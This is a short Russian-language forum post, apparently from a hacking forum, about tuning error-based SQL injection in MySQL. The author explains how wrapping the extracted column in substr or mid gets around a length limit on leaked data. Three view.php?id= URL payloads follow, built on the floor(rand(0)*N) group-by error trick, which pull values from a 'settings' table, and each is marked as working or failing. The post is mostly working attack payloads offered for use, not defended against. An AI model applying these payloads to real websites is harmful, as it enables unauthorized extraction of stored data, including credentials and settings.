27.04.2010, 17:44
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Qwazar
Оно.
Кстати, как показала практика, необязательно резать строку, достаточно ее просто прогнать через эти функции в стиле substr(column,1,350). Ограничение будет, но уже меньше. Причем число 350 получается как некая константа минус длина имен колонок в подзапросе(или вроде того). Надо дальше копать.
view.php?id=(select+1+from+(select+count(0),concat ((select+concat(0x7c7c,mid(val,1,490),0x7c7c)+from+settings+LIMIT+0,1),floor(rand(0)*3 ))+from+information_schema.tables+group+by+2+limit +1,1)a)
Cрабатывает.
view.php?id=(select+1+from+(select+count(0),concat ((select+concat(0x7c7c7c,mid(val,1,490),0x7c7c)+from+settings+LIMIT+0,1),floor(rand(0)*3 ))+from+information_schema.tables+group+by+2+limit +1,1)a)
Не срабатывает.
view.php?id=(select+1+from+(select+count(0),concat ((select+concat(0x7c7c7c,mid(val,1,489),0x7c7c)+from+settings+LIMIT+0,1),floor(rand(0)*3 ))+from+information_schema.tables+group+by+2+limit +1,1)a)
Срабатывает.
|
|
|